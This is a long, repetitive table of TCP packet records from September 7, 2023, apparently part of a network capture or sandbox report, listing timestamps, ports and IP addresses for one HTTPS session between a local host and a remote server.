Sep 7, 2023 09:31:08.246814966 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.246872902 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.251411915 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.251566887 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.251581907 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.251662970 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.256026030 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.256164074 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.256174088 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.256247044 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.260597944 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.260752916 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.260785103 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.260857105 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.265028000 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.265187979 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.265218973 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.265295029 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.269221067 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.269303083 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.269316912 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.269370079 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.273626089 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.273727894 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.273751974 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.273812056 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.277724981 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.277817011 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.277848005 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.277909994 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.281810999 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.281919956 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.283883095 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.283968925 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.283994913 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.284055948 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.287930012 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.288017035 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.288042068 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.288108110 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.292161942 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.292262077 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.292292118 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.292346001 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.295922041 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.296005964 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.296030045 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.296125889 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.299901009 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.299990892 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.300014973 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.300070047 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.300081968 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.300127983 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.303683043 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.303776979 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.303833008 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.303903103 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.307571888 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.307657003 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.307682037 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.307742119 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.311428070 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.311522007 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.311547041 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.311604977 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.314966917 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.315051079 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.315082073 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.315145969 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.319257975 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.319386959 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.319412947 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.319480896 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.322417974 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.322515965 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.322540045 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.322609901 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.326127052 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.326235056 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.326260090 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.326334000 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.326347113 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.326411009 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.329554081 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.329644918 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.331381083 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.331543922 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.331567049 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.331651926 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.334810972 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.334917068 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.334940910 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.335019112 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.338344097 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.338462114 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.338485956 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.338568926 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.341867924 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.341979027 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.342003107 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.342092037 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.345067978 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.345187902 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.345213890 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.345303059 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.348114967 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.348253012 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.348278046 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.348361015 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.348375082 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.348443031 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.351546049 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.351672888 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.352067947 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.352168083 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.354963064 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.355107069 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.355133057 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.355211020 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.358155966 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.358277082 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.358299971 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.358376980 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.361519098 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.361641884 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.361665964 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.361746073 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.364672899 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.364785910 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.364809990 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.364885092 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.367881060 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.368078947 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.368103027 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.368184090 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.370832920 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.370996952 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.372539997 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.372657061 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.372678995 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.372769117 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.375979900 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.376101017 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.376123905 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.376208067 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.379189014 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.379307032 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.379328966 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.379467010 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.381969929 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.382081985 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.382106066 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.382184029 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.384979963 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.385097980 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.385121107 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.385200977 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.388375044 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.388494968 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.388524055 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.388608932 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.391093016 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.391213894 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.391242027 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.391324043 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.394215107 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.394325018 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.394351959 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.394435883 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.397097111 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.397223949 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.397248983 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.397325993 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.400120974 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.400260925 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.400284052 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.400365114 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.403217077 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.403374910 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.403398991 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.403470039 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.406105042 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.406256914 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.406280994 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.406411886 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.409086943 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.409205914 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.409229994 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.409301996 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.410408020 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.410495043 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.410512924 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.410579920 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.413501024 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.413600922 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.413625002 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.413681030 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.416353941 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.416534901 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.416560888 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.416635036 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.419157028 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.419338942 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.419363022 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.419431925 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.422043085 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.422142029 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.422180891 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.422249079 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.424732924 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.424834967 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.424859047 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.424916029 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.427624941 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.427781105 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.427805901 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.427880049 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.430392027 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.430526018 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.430552959 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.430625916 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.433101892 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.433218002 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.433243990 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.433341980 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.436007977 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.436103106 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.436125994 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.436183929 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.438848972 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.438961983 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.438986063 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.439055920 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.441519022 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.441648960 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.441673994 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.441731930 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.444411993 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.444535971 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.445432901 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.445524931 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.445547104 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.445605993 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.448096037 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.448191881 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.448218107 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.448277950 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.450862885 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.450946093 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.450968027 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.451024055 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.453377008 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.453480959 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.453505993 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.453577042 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.456007004 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.456197023 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.456219912 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.456289053 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.458465099 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.458565950 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.458590984 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.458662987 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.461102962 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.461209059 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.461236000 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.461308002 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.463845015 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.463948965 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.463973045 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.464046001 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.466121912 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.466223001 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.466249943 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.466315985 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.468569040 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.468664885 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.468691111 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.468756914 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.471082926 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.471173048 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.471195936 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.471271038 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.473474026 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.473593950 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.473617077 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.473681927 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.475867033 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.475975990 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.477042913 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.477149963 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.477171898 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.477242947 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.479481936 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.479593039 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.479617119 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.479691029 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.482024908 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.482112885 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.482139111 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.482198000 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.484354019 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.484452963 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.484483004 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.484549046 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.486685038 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.486764908 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.486787081 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.486843109 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.489089966 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.489182949 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.489207029 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.489285946 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.491449118 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.491556883 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.491580963 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.491682053 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.494026899 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.494138956 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.494261026 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.494352102 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.494473934 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.494546890 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.496205091 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.496360064 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.496382952 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.496443033 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.498322010 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.498420000 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.498442888 CEST	443	49759	142.251.2.132	192.168.2.7
Sep 7, 2023 09:31:08.498507023 CEST	49759	443	192.168.2.7	142.251.2.132
Sep 7, 2023 09:31:08.500648975 CEST	443	49759	142.251.2.132	192.168.2.7
